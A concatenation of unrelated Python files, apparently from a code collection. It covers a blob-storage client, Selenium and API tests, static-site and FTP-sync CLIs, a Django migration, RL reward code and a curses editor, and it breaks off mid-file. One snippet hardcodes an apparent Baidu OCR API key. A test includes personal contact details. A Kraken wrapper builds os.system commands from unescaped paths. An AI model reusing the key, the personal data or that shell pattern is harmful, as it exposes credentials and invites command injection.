configuration_overrider.abstract_overrider import AbstractOverrider class DummyOverrider(AbstractOverrider): def __init__(self, key: str, value: str): self.__key = key self.__value = value def get(self, key) -> str: _result = None if key == self.__key: _result = self.__value return _resultdanieldavidraj/Blob-Storage-System import re import mimetypes import requests from os.path import exists as file_exists from requests.exceptions import HTTPError base_url = "http://localhost:8000" 
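# A single requests.Session (created below) is reused for every call so that cookies set by the server, e.g. by /create_session, persist across the login check and the subsequent file operations.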
session = requests.Session() def user_logged_in(): response = session.get(f"{base_url}/loggedin") if response.status_code == 200: return True return False def get_session(): try: response = session.get(f"{base_url}/loggedin") response.raise_for_status() except HTTPError as http_err: print(response.text) else: return response.json()['token'] def create_session(token): try: payload = {'token': token} response = session.post(f"{base_url}/create_session", json=payload) response.raise_for_status() except HTTPError as http_err: print(http_err) def get_token(username, password): payload = {'username': username, 'password': password} try: response = session.post(f"{base_url}/token", data=payload) response.raise_for_status() except HTTPError as http_err: print(response.json()['detail']) else: return response.json()['token_type'] + " " + response.json()['access_token'] def Login(): username = input("Username: ") password = input("Password: ") token = get_token(username, password) if token: print("\nSuccessfully logged in") create_session(token) return token def Register(): username = input("Username: ") password = input("Password: ") payload = {'username': username, 'password': password} try: response = session.post(f"{base_url}/users/", json=payload) response.raise_for_status() except HTTPError as http_err: print(response.json()['detail']) else: print("\nSuccessfully registered") token = get_token(username, password) create_session(token) return token def Authentication(): while True: if user_logged_in(): print("User already logged in") return get_session() else: print("1) Login") print("2) Register") try: choice = int(input("Choice: ")) if choice == 1: token = Login() if token: return token elif choice == 2: token = Register() if token: return token else: print("Invalid entry") except ValueError as ve: print("Enter an integer") def display_files(files): sno = 1 for file in files: print(f"{sno})") print(f"Id: {file['id']}") print(f"Name: {file['title']}") print(f"Description: {file['description']}") sno += 1 def display_users(users): sno = 1 for user in users: print(f"{sno})") print(f"Id: {user['id']}") print(f"Username: {user['username']}") sno += 1 def view_file(id): file_id = input("Enter the id of the file to view: ") try: response = session.get(f"{base_url}/users/{id}/files/{file_id}") response.raise_for_status() except HTTPError as http_err: print(response.json()['detail']) else: file = response.json() print(f"Id: {file['id']}") print(f"Name: {file['title']}") print(f"Description: {file['description']}") def upload_file(id): try: file_name = input("Enter the file name: ") if file_exists(file_name): content_type = mimetypes.guess_type(file_name) files = {'uploadfile': (file_name, open(file_name, 'rb'), content_type[0])} response = session.post(f"{base_url}/users/{id}/files", files=files) response.raise_for_status() else: print("File not found") except HTTPError as http_err: print(response.json()['detail']) else: print("Successfully uploaded") def edit_file(id): file_id = input("Enter the id of the file to edit: ") print("Enter to change or leave empty to remain as it is!") title = input("Enter the name of the file: ") description = input("Enter the description of the file: ") data = {'title': title, 'description': description} try: response = session.put(f"{base_url}/users/{id}/files/{file_id}", json=data) response.raise_for_status() except HTTPError as http_err: print(response.json()['detail']) else: print("Successfully edited") def delete_file(id): file_id = input("Enter the id of the file 
to delete: ") try: response = session.delete(f"{base_url}/users/{id}/files/{file_id}") response.raise_for_status() except HTTPError as http_err: print(response.json()['detail']) else: print("Successfully deleted") def share_file(id): file_id = input("Enter the id of the file to share: ") response = session.get(f"{base_url}/users/") display_users(response.json()) username = input("Enter the username of the user to share: ") data = {'username': username} try: response = session.patch(f"{base_url}/users/{id}/files/{file_id}/share", json=data) response.raise_for_status() except HTTPError as http_err: print(response.json()['detail']) else: print("Successfully shared") def download_file(id): file_id = input("Enter the id of the file to download: ") try: response = session.get(f"{base_url}/users/{id}/files/{file_id}/download", allow_redirects=True) response.raise_for_status() except HTTPError as http_err: print(response.json()['detail']) else: content_type = response.headers.get('content-type') extension = content_type.split("/")[-1] if 'plain' in extension: extension = 'txt' cd = response.headers.get('content-disposition') fname = re.findall("filename=(.+)", cd) if not fname: fname = re.findall("utf-8''(.+)", cd) fname = fname[0].replace('"', '').replace('%20', ' ') if extension not in fname: fname += '.' + extension open(fname, 'wb').write(response.content) print("Successfully downloaded") def compress_file(id): file_id = input("Enter the id of the file to compress: ") try: response = session.get(f"{base_url}/users/{id}/files/{file_id}/compress", allow_redirects=True) response.raise_for_status() except HTTPError as http_err: print(response.json()['detail']) else: cd = response.headers.get('content-disposition') fname = re.findall("filename=(.+)", cd) if not fname: fname = re.findall("utf-8''(.+)", cd) fname = fname[0].replace('"', '').replace('%20', ' ') open(fname, 'wb').write(response.content) print("Successfully compressed and downloaded") def logout(): try: response = session.post(f"{base_url}/logout") response.raise_for_status() except HTTPError as http_err: print(response.json()['detail']) else: print("Successfully logged out") return True def Menu(id): while True: response = session.get(f"{base_url}/users/{id}/files") print("\nOwn Files: ") own_files = response.json()['own_files'] if own_files: display_files(own_files) else: print("No files owned") print("\nShared Files: ") shared_files = response.json()['shared_files'] if shared_files: display_files(shared_files) else: print("No files shared") print("\n1) View file") print("2) Upload file") print("3) Rename file") print("4) Delete file") print("5) Share file") print("6) Download file") print("7) Compress file") print("8) Logout") try: choice = int(input("Choice: ")) if choice == 1: view_file(id) elif choice == 2: upload_file(id) elif choice == 3: edit_file(id) elif choice == 4: delete_file(id) elif choice == 5: share_file(id) elif choice == 6: download_file(id) elif choice == 7: compress_file(id) elif choice == 8: if logout(): break else: print("Invalid entry") except ValueError as ve: print("Enter an integer") if __name__=="__main__": print("Simple Blob Storage System\n") token = Authentication() session.headers.update({ "accept": "application/json", "Authorization": token }) try: response = session.get(f"{base_url}/users/me/") response.raise_for_status() except HTTPError as http_err: print(response.json()['detail']) else: id = response.json()['id'] print(f"Username: {response.json()['username']}") Menu(id) Task 11_attempt 2.py import 
pytest from selenium import webdriver from selenium.webdriver.support.wait import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By from selenium.webdriver.support.select import Select import random import string @pytest.fixture def driver(request): wd = webdriver.Chrome() request.addfinalizer(wd.quit) return wd def generate_random_email(): domains = ["hotmail.com", "gmail.com", "aol.com", "mail.com" , "mail.kz", "yahoo.com"] letters = string.ascii_lowercase[:12] name = ''.join(random.choice(letters) for i in range(10)) email = name + '@' + random.choice(domains) return email def test_example(driver): driver.get("http://litecart.stqa.ru/en/create_account") driver.find_element_by_css_selector("tr:nth-child(1) td:nth-child(1) [name=tax_id]").send_keys("87319") driver.find_element_by_css_selector("tr:nth-child(1) td:nth-child(2) [name=company]").send_keys("Piterstar") driver.find_element_by_css_selector("tr:nth-child(2) td:nth-child(1) [name=firstname]").send_keys("Anna") driver.find_element_by_css_selector("tr:nth-child(2) td:nth-child(2) [name=lastname]").send_keys("Kolegova") driver.find_element_by_css_selector("tr:nth-child(3) td:nth-child(1) [name=address1]").send_keys("960 Sterling Pl Brooklyn, NY 11213") driver.find_element_by_css_selector("tr:nth-child(4) td:nth-child(1) [name=postcode]").send_keys("63837") driver.find_element_by_css_selector("tr:nth-child(4) td:nth-child(2) [name=city]").send_keys("New York") driver.find_element_by_css_selector("span.select2-selection__arrow").click() select1 = Select(driver.find_element_by_css_selector("select.select2-hidden-accessible")) select1.select_by_visible_text("United States") wait = WebDriverWait(driver, 10) element = wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR,"tr:nth-child(5) td:nth-child(2) select"))) driver.find_element_by_css_selector("tr:nth-child(5) td:nth-child(2) select").click() select_zone = Select(driver.find_element_by_css_selector("tr:nth-child(5) td:nth-child(2) select")) select_zone.select_by_visible_text("Alaska") current_email = generate_random_email() driver.find_element_by_css_selector("tr:nth-child(6) td:nth-child(1) [name=email]").send_keys(current_email) driver.find_element_by_css_selector("tr:nth-child(6) td:nth-child(2) [name=phone]").send_keys("+79117621690") driver.find_element_by_css_selector("tr:nth-child(8) td:nth-child(1) [name=password]").send_keys("") driver.find_element_by_css_selector("tr:nth-child(8) td:nth-child(2) [name=confirmed_password]").send_keys("") driver.find_element_by_css_selector("tr:nth-child(9) button").click() driver.get("http://litecart.stqa.ru/en/") driver.find_element_by_css_selector("div#box-account li:nth-child(4) a").click() driver.find_element_by_css_selector("div.content [name=email]").send_keys(current_email) driver.find_element_by_css_selector("div.content [name=password]").send_keys("") driver.find_element_by_css_selector("tr:nth-child(4) button").click() driver.find_element_by_css_selector("div#box-account li:nth-child(4) a").click() examples/index.py1-10 #!/usr/bin/env python from __future__ import print_function from temper import Temper def main(): # init and call temper to render temper = Temper() print(temper.render(Index().render)) print(temper.render(Page().render)) print(temper.render(SeriousPage().render)) class Index(object): ''' Hello, Example!

    Hello, World!

    ''' title = 'Hello, Example!' def body(self, t, c): # a "block" can be any python function or property t('Hello, World!') def render(self, t, c): # render the base template t.doctype t.comment(self.__class__.__name__) with t.html(): with t.head(): with t.title(): t(self.title) with t.style(type='text/css'): t('.bold { font-weight: bold; }') with t.body(): with t.p(class_='bold'): self.body(t, c) class Page(Index): ''' Hello, Example!

    Hello, World! Hello, Temper!

    ''' def body(self, t, c): # use python inheritance for blocks super(Page, self).body(t, c) t('Hello, Temper!') class SeriousPage(Index): ''' Now then...

    Let's get down to business.

    ''' title = 'Now then...' def body(self, t, c): # don't call super to completely override t("Let's get down to business.") if __name__ == '__main__': main() import os import sys from stango import Stango def quickstart(): conf_code = '''\ from stango.files import Files import views index_file = 'index.html' files = Files( ('', views.hello, { 'message': 'Hello, World!', 'link': 'greeting.html' }), ('greeting.html', views.hello, { 'message': 'Greetings, World!', 'link': 'index.html' }), ) ''' views_code = '''\ def hello(context, message, link): return context.render_template('hello.html', message=message, link=link) ''' hello_template = '''\ {{ message }}

    {{ message }}

    Another greeting here. ''' hello_css = '''\ h1 { color: #0c0; } ''' init_files = [ ('__init__.py', '', 0o644), ('conf.py', conf_code, 0o644), ('views.py', views_code, 0o644), ('static/hello.css', hello_css, 0o644), ('templates/hello.html', hello_template, 0o644), ] for filename, contents, mode in init_files: print('Creating %s' % filename) dirname = os.path.dirname(filename) if dirname and not os.path.exists(dirname): os.makedirs(dirname) fobj = open(filename, 'w') fobj.write(contents) fobj.close() os.chmod(filename, mode) print('Now run "stango runserver" or "stango generate"') return 0 def print_help(): print('''\ usage: %s COMMAND [ARGS...] Available commands: generate [OUTDIR] Generate the pages as flat files to directory OUTDIR (default: out). If OUTDIR doesn't exist, it is created, and if it already exists, it is cleared first. runserver [[HOST:]PORT] Start the development server on http://HOST:PORT/ (default: http://127.0.0.1:8000/). quickstart Initialize a boilerplate example project in the current directory. ''' % sys.argv[0]) sys.exit(2) CONFIG_DEFAULTS = { 'autoreload': [], 'index_file': None, 'jinja_extensions': [], 'post_render_hook': None, } def run(): if len(sys.argv) < 2: print_help() if sys.argv[1] not in ['runserver', 'generate', 'quickstart']: print_help() if sys.argv[1] == 'quickstart': if len(sys.argv) != 2: print_help() sys.exit(quickstart()) if not os.path.exists('conf.py'): print('conf.py not found', file=sys.stderr) sys.exit(1) try: backup = sys.path sys.path = [''] + sys.path config = {} exec(open('conf.py').read(), config) finally: sys.path = backup for k, v in list(CONFIG_DEFAULTS.items()): config.setdefault(k, v) if 'files' not in config: print("conf.py doesn't define the 'files' variable", file=sys.stderr) sys.exit(1) manager = Stango() manager.files = config['files'] manager.index_file = config['index_file'] manager.jinja_extensions = config['jinja_extensions'] manager.template_dirs.insert(0, 'templates') if config['post_render_hook']: manager.add_hook('post_render_hook', config['post_render_hook']) if sys.argv[1] == 'runserver': host = '127.0.0.1' port = 8000 if len(sys.argv) == 3: if ':' in sys.argv[2]: host, port = sys.argv[2].split(':') else: port = sys.argv[2] try: port = int(port) except ValueError: print_help() elif len(sys.argv) > 3: print_help() def do_serve(): print('Starting server at http://%s:%d/' % (host, port)) httpd = manager.make_server(host, port, verbose=True) httpd.serve_forever() import stango.autoreload stango.autoreload.main(do_serve, config['autoreload']) elif sys.argv[1] == 'generate': if len(sys.argv) == 2: outdir = 'out' elif len(sys.argv) == 3: outdir = sys.argv[2] else: print_help() print('Generating to %s...' 
% outdir) sys.exit(manager.generate(outdir) or 0) else: print_help() menu = ('a','b','c','d','e') for food in menu: print(food) menu = ('a','b','c','d','f') for food in menu: print(food)# Generated by Django 3.1.7 on 2021-03-29 10:12 from django.conf import settings from django.db import migrations, models import django.db.models.deletion import phonenumber_field.modelfields class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Building', fields=[ ('building_id', models.CharField(max_length=10, primary_key=True, serialize=False)), ('building_name', models.CharField(max_length=30)), ('n_floors', models.IntegerField(default=0)), ('n_flats', models.IntegerField(default=0)), ], ), migrations.CreateModel( name='Flat', fields=[ ('flat_id', models.CharField(max_length=10, primary_key=True, serialize=False)), ('flat_no', models.CharField(max_length=20)), ('flat_type', models.IntegerField()), ('flat_area', models.IntegerField(default=0)), ('vaccancy', models.IntegerField(default=0)), ('building_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='buildings.building')), ], ), migrations.CreateModel( name='Service_Directory', fields=[ ('service_id', models.CharField(max_length=10, primary_key=True, serialize=False)), ('name', models.CharField(max_length=50)), ('profession', models.CharField(max_length=30)), ('building_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='buildings.building')), ], ), migrations.CreateModel( name='Phone_Directory', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('phone_no', phonenumber_field.modelfields.PhoneNumberField(max_length=128, region=None)), ('user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='buildings.service_directory')), ], ), migrations.CreateModel( name='Occupies', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('ownership', models.CharField(choices=[('Tenant', 'Tenant'), ('Owner', 'Owner')], max_length=10)), ('flat_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='buildings.flat')), ('user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], ), ] dedok/tnt-accountst/basic_test.py #!/usr/bin/env python # # Copyrights (C) 2017 # import sys import urllib2 import traceback import urlparse import json import time # # Helpers # def get(url, verbose = False): out = '' try: res = urllib2.urlopen(urllib2.Request(url)) out = res.read() out = out + res.read() rc = res.getcode() if verbose: print("url: ", url, " code: ", rc, " recv: '", out, "'") return (rc, out) except urllib2.HTTPError, e: if e.code == 400: out = e.read(); if verbose: print("url: ", url, " code: ", e.code, " recv: '", out, "'") return (e.code, out) except Exception, e: print traceback.format_exc() return (False, e) def post(url, data, verbose = False): out = '{}' try: req = urllib2.Request(url) req.add_header('Content-Type', 'application/json') res = urllib2.urlopen(req, json.dumps(data).encode('utf8')) out = res.read() out = out + res.read() rc = res.getcode() if verbose: print("code: ", rc, " recv: '", out, "'") return (rc, json.loads(out)) except urllib2.HTTPError as e: if e.code == 400: out = e.read(); return (e.code, json.loads(out)) except Exception as e: print(traceback.format_exc()) return (False, e) ## Test cases 
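# The checks below exercise the HTTP API end to end against a local server: create a user via /add/user, attach ten operations to that account via /add/operation, then read them back through the /get/operations and /get/account/* endpoints, asserting a 200 response and that the echoed parameters match what was sent.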
#BASE_URL = 'http://sh2.tarantool.org/api' BASE_URL = 'http://127.0.0.1:8081/api' account_id = int(time.time()) print ('[+] /add/user') url = BASE_URL + '/add/user' user_params = {"params":[{"account_id": account_id, "user_name": "Vasiliy" }]} rc, out = post(url, user_params) print (rc, out) assert rc == 200, 'rc != 200' user_params['params'][0]['id'] = out['result'][0]['id'] assert user_params['params'] == out['result'], 'params != result' print ('[+] OK') print ('[+] /add/operations') for _ in range(0, 10): url = BASE_URL + '/add/operation' opt_params = {"params":[{ "account_id": account_id, "timestamp": int(time.time()) - _, "type": 0, "description": "Give me my money!!!!", "amount": 100500, "user_id": user_params['params'][0]['id'] }]} rc, out = post(url, opt_params) opt_params['params'][0]['id'] = out['result'][0][1]['id'] out['result'][0][1]['account_id'] = opt_params['params'][0]['account_id'] assert rc == 200, 'rc != 200' assert user_params['params'][0] == out['result'][0][0] and \ opt_params['params'][0] == out['result'][0][1], 'params != result' print ('[+] OK') print ('[+] /get/operations') url = BASE_URL + '/get/operations?ts_start=0&ts_end=' + str(int(time.time())) rc, out = get(url) print ('[+] OK') print ('[+] /get/account/operations') url = BASE_URL + '/get/account/operations?account_id=' + str(account_id) rc, out = get(url) print ('[+] OK') print ('[+] /get/account/balance') url = BASE_URL + '/get/account/balance?account_id=' + str(account_id) rc, out = get(url) print ('[+] OK') """Clean Code in Python - Chapter 5: Decorators Unit tests for class decorators """ import unittest from datetime import datetime from decorator_class_1 import LoginEvent as LoginEvent1 from decorator_class_2 import LoginEvent as LoginEvent2 class TestLoginEventSerialized(unittest.TestCase): classes_under_test = (LoginEvent1, LoginEvent2) def test_serialization(self): for class_ in self.classes_under_test: with self.subTest(case=class_): event = class_( "username", "password", "127.0.0.1", datetime(2016, 7, 20, 15, 45), ) expected = { "username": "username", "password": "**", "ip": "127.0.0.1", "timestamp": "2016-07-20 15:45", } self.assertEqual(event.serialize(), expected) if __name__ == "__main__": unittest.main() wengzy/pyftpsync # -*- coding: utf-8 -*- """ Simple folder synchronization using FTP. (c) 2012-2021 ; see https://github.com/mar10/pyftpsync Licensed under the MIT license: https://www.opensource.org/licenses/mit-license.php Usage examples: > pyftpsync.py --help > pyftpsync.py upload .
ftps://example.com/myfolder """ import argparse import platform import sys from pprint import pprint from ftpsync import __version__ from ftpsync.cli_common import ( common_parser, creds_parser, matcher_parser, verbose_parser, ) from ftpsync.run_command import add_run_parser, handle_run_command from ftpsync.scan_command import add_scan_parser from ftpsync.synchronizers import ( BiDirSynchronizer, DownloadSynchronizer, UploadSynchronizer, ) from ftpsync.targets import FsTarget, make_target from ftpsync.tree_command import add_tree_parser from ftpsync.util import ( DEBUG_FLAGS, PYTHON_VERSION, check_cli_verbose, namespace_to_dict, set_pyftpsync_logger, ) # =============================================================================== # run # =============================================================================== def run(): """CLI main entry point.""" # Use print() instead of logging when running in CLI mode: set_pyftpsync_logger(None) parser = argparse.ArgumentParser( description="Synchronize folders over FTP.", epilog="See also https://github.com/mar10/pyftpsync", parents=[verbose_parser], ) # Note: we want to allow --version to be combined with --verbose. However # on Py2, argparse makes sub-commands mandatory, unless `action="version"` is used. if check_cli_verbose(3) > 3: version_info = "pyftpsync/{} Python/{} {}".format( __version__, PYTHON_VERSION, platform.platform() ) else: version_info = "{}".format(__version__) parser.add_argument("-V", "--version", action="version", version=version_info) subparsers = parser.add_subparsers(help="sub-command help") # --- Create the parser for the "upload" command --------------------------- sp = subparsers.add_parser( "upload", parents=[verbose_parser, common_parser, matcher_parser, creds_parser], help="copy new and modified files to remote folder", ) sp.add_argument( "local", metavar="LOCAL", default=".", help="path to local folder (default: %(default)s)", ) sp.add_argument("remote", metavar="REMOTE", help="path to remote folder") sp.add_argument( "--force", action="store_true", help="overwrite remote files, even if the target is newer " "(but no conflict was detected)", ) sp.add_argument( "--resolve", default="ask", choices=["local", "skip", "ask"], help="conflict resolving strategy (default: '%(default)s')", ) sp.add_argument( "--delete", action="store_true", help="remove remote files if they don't exist locally", ) sp.add_argument( "--delete-unmatched", action="store_true", help="remove remote files if they don't exist locally " "or don't match the current filter (implies '--delete' option)", ) sp.set_defaults(command="upload") # --- Create the parser for the "download" command ------------------------- sp = subparsers.add_parser( "download", parents=[verbose_parser, common_parser, matcher_parser, creds_parser], help="copy new and modified files from remote folder to local target", ) sp.add_argument( "local", metavar="LOCAL", default=".", help="path to local folder (default: %(default)s)", ) sp.add_argument("remote", metavar="REMOTE", help="path to remote folder") sp.add_argument( "--force", action="store_true", help="overwrite local files, even if the target is newer " "(but no conflict was detected)", ) sp.add_argument( "--resolve", default="ask", choices=["remote", "skip", "ask"], help="conflict resolving strategy (default: '%(default)s')", ) sp.add_argument( "--delete", action="store_true", help="remove local files if they don't exist on remote target", ) sp.add_argument( "--delete-unmatched", action="store_true", help="remove local 
files if they don't exist on remote target " "or don't match the current filter (implies '--delete' option)", ) sp.set_defaults(command="download") # --- Create the parser for the "sync" command ----------------------------- sp = subparsers.add_parser( "sync", parents=[verbose_parser, common_parser, matcher_parser, creds_parser], help="synchronize new and modified files between remote folder and local target", ) sp.add_argument( "local", metavar="LOCAL", default=".", help="path to local folder (default: %(default)s)", ) sp.add_argument("remote", metavar="REMOTE", help="path to remote folder") sp.add_argument( "--resolve", default="ask", choices=["old", "new", "local", "remote", "skip", "ask"], help="conflict resolving strategy (default: '%(default)s')", ) sp.set_defaults(command="sync") # --- Create the parser for the "run" command ----------------------------- add_run_parser(subparsers) # --- Create the parser for the "scan" command ----------------------------- add_scan_parser(subparsers) # --- Create the parser for the "tree" command ----------------------------- add_tree_parser(subparsers) # --- Parse command line --------------------------------------------------- args = parser.parse_args() args.verbose -= args.quiet del args.quiet # print("verbose", args.verbose) ftp_debug = 0 if args.verbose >= 6: ftp_debug = 1 if args.debug: if args.verbose < 4: parser.error("'--debug' requires verbose level >= 4") DEBUG_FLAGS.update(args.debug) # Modify the `args` from the `pyftpsync.yaml` config: if getattr(args, "command", None) == "run": handle_run_command(parser, args) if callable(getattr(args, "command", None)): # scan_handler try: return args.command(parser, args) except KeyboardInterrupt: print("\nAborted by user.", file=sys.stderr) sys.exit(3) elif not hasattr(args, "command"): parser.error( "missing command (choose from 'upload', 'download', 'run', 'sync', 'scan')" ) # Post-process and check arguments if hasattr(args, "delete_unmatched") and args.delete_unmatched: args.delete = True args.local_target = make_target(args.local, {"ftp_debug": ftp_debug}) if args.remote == ".": parser.error("'.' is expected to be the local target (not remote)") args.remote_target = make_target(args.remote, {"ftp_debug": ftp_debug}) if not isinstance(args.local_target, FsTarget) and isinstance( args.remote_target, FsTarget ): parser.error("a file system target is expected to be local") # Let the command handler do its thing opts = namespace_to_dict(args) if args.command == "upload": s = UploadSynchronizer(args.local_target, args.remote_target, opts) elif args.command == "download": s = DownloadSynchronizer(args.local_target, args.remote_target, opts) elif args.command == "sync": s = BiDirSynchronizer(args.local_target, args.remote_target, opts) else: parser.error("unknown command '{}'".format(args.command)) s.is_script = True try: s.run() except KeyboardInterrupt: print("\nAborted by user.", file=sys.stderr) sys.exit(3) finally: # Prevent sporadic exceptions in ftplib, when closing in __del__ s.local.close() s.remote.close() stats = s.get_stats() if args.verbose >= 5: pprint(stats) elif args.verbose >= 1: if args.dry_run: print("(DRY-RUN) ", end="") print( "Wrote {}/{} files in {} directories, skipped: {}.".format( stats["files_written"], stats["local_files"], stats["local_dirs"], stats["conflict_files_skipped"], ), end="", ) if stats["interactive_ask"]: print() else: print(" Elap: {}.".format(stats["elap_str"])) return # Script entry point if __name__ == "__main__": # Just in case... 
from multiprocessing import freeze_support freeze_support() run() # Import the text recognition (OCR) SDK from aip import AipOcr # Define constants APP_ID = '9838807' API_KEY = 'ZyNwfGnvQQnYPIuGt25iTWhw' SECRET_KEY = '' # Read the image file def get_file_content(filePath): with open(filePath, 'rb') as fp: return fp.read() # Initialize the AipOcr client aipOcr = AipOcr(APP_ID, API_KEY, SECRET_KEY) # Define request options options = { 'detect_direction': 'true', 'language_type': 'CHN_ENG', } # Call the general text recognition API result = aipOcr.basicGeneral(get_file_content('general.png'), options) print(result) sigma_graph/envs/figure8/rewards/rewards_simple.py from math import ceil # default hyper-parameters for rewards DEFAULT_REWARDS = { "step": {"reward_step_on": True, "red_2_blue": 4, "blue_2_red": -3, "red_overlay": -2, }, "episode": { "reward_episode_on": True, "episode_decay_soft": True, "health_lookup": {"type": "table", "reward": [32, 16, 8, 4, 2, 0], "damage": [0, 1, 2, 3, 4, 100]}, "faster_lookup": {"type": "segment", "pivot_step": 10, "reward_init": 16, "reward_decay": 1}, "soft_bound": {"dist": [1, 2], "decay_factor": [0.25, 0.125]} }, } def get_step_engage(r_engages_b, b_engages_r, team_switch=False, **rewards): assert len(rewards), "No step rewards provided.." step_reward = 0 if r_engages_b: step_reward += rewards["red_2_blue"] if b_engages_r: step_reward += rewards["blue_2_red"] if team_switch is True: step_reward = -step_reward return step_reward def get_step_overlay(overlay, **rewards): assert len(rewards), "No step rewards provided.." return rewards["red_overlay"] if overlay else 0 def get_episode_reward_agent(health_lost_self, health_lost_opponent, threshold_self, threshold_opponent, damage_cost_self=0, end_step_opponent=-1, **rewards): assert len(rewards), "No episode rewards provided.." episode_reward = 0 # discourage free loaders # if damage_cost_self == 0: # return episode_reward threshold_offset = rewards["soft_bound"]["dist"][-1] if rewards["episode_decay_soft"] is True else 0 # give rewards for terminating the opponent agent if health_lost_opponent >= threshold_opponent - threshold_offset: # health based reward for surviving episode_reward += get_reward_type(health_lost_self, **rewards["health_lookup"]) # speed based reward for fast termination if end_step_opponent > 0: episode_reward += get_reward_type(end_step_opponent, **rewards["faster_lookup"]) # apply soft boundary factor if rewards["episode_decay_soft"] is True and health_lost_opponent < threshold_opponent: _dist = threshold_opponent - health_lost_opponent index = next(_idx for _idx, _val in enumerate(rewards["soft_bound"]["dist"]) if _val >= _dist) episode_reward = ceil(episode_reward * rewards["soft_bound"]["decay_factor"][index]) return episode_reward def get_reward_type(value, **_dict): _reward = 0 _type = _dict["type"] if _type == "none": return _reward elif _type == "table": _reward = get_table_reward(value, **_dict) elif _type == "segment": _reward = get_segment_reward(value, **_dict) else: assert False, f"Reward function not implemented:{_dict}" return _reward def get_table_reward(damage_taken, **_dict): # find the index of the first element in the list that is no less than the target damage index = next(_idx for _idx, _val in enumerate(_dict["damage"]) if _val >= damage_taken) return _dict["reward"][index] def get_segment_reward(step, **_dict): # segment reward function: [rew_start (from step 0 to pivot_step) -> (linear rew_decay per step) -> 0] step_start = _dict["pivot_step"] reward_start = _dict["reward_init"] reward_decay = _dict["reward_decay"] if step > step_start: _reward = reward_start - int((step -
step_start) * reward_decay) reward = _reward if _reward > 0 else 0 else: reward = reward_start return reward def get_episode_reward_team(health_list_r, health_list_b, health_init, damage_thres_r, damage_thres_b, damage_list_r, endtime_list_b, **rewards): assert len(rewards), "No episode rewards provided.." episode_reward = 0 # TODO>> team based reward for all agents in the team return episode_reward BoyanZhou/LongStrain """ This script processes raw reads data by Kraken Must include "--use-mpa-style --report-zero-counts" in parameters Update log: Date: 2021/06/25 Author: 1. make it a module in LongStrain 2. version of kraken/2.0.8 """ import os import sys def kraken_process_total(sample_name_list, all_sample_fq_path_list, sample_output_folder_list, kraken_database_path, logger): """ Get processed fq and relative abundance report by Kraken :param sample_name_list: ["sample1", "sample2"] :param all_sample_fq_path_list: [["path/x.fq"], ["path/x_R1.fq", "path/x_R2.fq"]] :param sample_output_folder_list: ["output_path/subject1/sample1", "output_path/subject1/sample2"] :param kraken_database_path: "/gpfs/data/lilab/home/zhoub03/software/kraken2/NCBI_standard" :param logger: a logging object :return: sample_output.txt, sample_report.txt, for single, """ for sample_index in range(len(sample_name_list)): sample_name = sample_name_list[sample_index] sample_fq_path_list = all_sample_fq_path_list[sample_index] sample_output_folder = sample_output_folder_list[sample_index] # paired-end or single-end if len(sample_fq_path_list) == 1: # single command_kraken2 = f"kraken2 --db {kraken_database_path} --report {sample_output_folder}/{sample_name}_" \ f"report.txt --use-mpa-style --report-zero-counts --classified-out " \ f"{sample_output_folder}/{sample_name}_#.fq {sample_fq_path_list[0]} " \ f"--output {sample_output_folder}/{sample_name}_output.txt" elif len(sample_fq_path_list) == 2: # paied command_kraken2 = f"kraken2 --db {kraken_database_path} --report {sample_output_folder}/{sample_name}_" \ f"report.txt --use-mpa-style --report-zero-counts --paired --classified-out " \ f"{sample_output_folder}/{sample_name}_#.fq {sample_fq_path_list[0]} " \ f"{sample_fq_path_list[1]} --output {sample_output_folder}/{sample_name}_output.txt" else: logger.info(f"Error! 
{sample_name} has incorrect number of fqs: {sample_fq_path_list} Terminated.") sys.exit() logger.info(f"Processing {sample_name} by Kraken: {command_kraken2}") os.system(command_kraken2) czechuuu/MTE import curses import loc_constants as const from typing import List # constants def main(stdscr): # TODO loading from files contents: List[List[str]] = [[]] char = "" special = "" while True: # getting current cursour coordinates x: int y: int y, x = stdscr.getyx() max_x: int max_y: int max_y, max_x = stdscr.getmaxyx() upper_rights = [f"{y}:{x}", ""] # text in the upper right corner # printing the test in the upper right corner def print_rights(elements): try: for num, el in enumerate(elements): stdscr.addstr(num*2, max_x - len(el) - 2, el) stdscr.move(y, x) stdscr.refresh() except Exception: pass print_rights(upper_rights) # getting a key char: str = stdscr.getkey() # exit condition default: ^Q if char == "\x11" or char == const.A_EXIT: try: special = "EXIT (y/n)" upper_rights[1] = special print_rights(upper_rights) accept = stdscr.getkey() accepted = {"y", "Y", " ", " "} if accept in accepted: exit() else: special = "not exiting" upper_rights[1] = special except Exception: pass # printing ascii characters if len(char) == 1 and ord(char) in range(32, 256) and char != "\x0a": try: contents[y].insert(x, char) y, x = y, x + 1 except Exception: pass # newline elif char == "\n": try: if x == len(contents[y]): # newline in the end of a line contents.insert(y + 1, []) else: # newline in the middle of a line popped_value = contents[y][x:] contents.insert(y + 1, popped_value) del popped_value y, x = y + 1, 0 except Exception: pass # backspace elif char == "\x08" or char == "^?": try: if not (y == 0 and x == 0): # cant delete nothing if x > 0: # standard backspace contents[y].pop(x-1) y, x = y, x - 1 stdscr.refresh() else: # backspace on a newline popped_value = contents.pop(y) if popped_value != "" and y != 0: for el in popped_value: contents[y-1].append(el) y, x = y - 1, len(contents[y - 1]) except Exception: pass # keys default: arrows or ^ESDF elif char == "KEY_UP" or char == "\x05" or char == const.A_UP: try: if y > 0: if len(contents[y - 1]) >= x: y, x = y - 1, x else: y, x = y-1, len(contents[y - 1]) except Exception: pass elif char == "KEY_DOWN" or char == "\x04" or char == const.A_DOWN: try: if y < len(contents) - 1: if len(contents[y + 1]) >= x: y, x = y + 1, x else: y, x = y + 1, len(contents[y + 1]) except Exception: pass elif char == "KEY_LEFT" or char == "\x13" or char == const.A_LEFT: try: if not (y == 0 and x == 0): if x != 0: y, x = y, x - 1 else: y, x = y - 1, len(contents[y - 1]) except Exception: pass elif char == 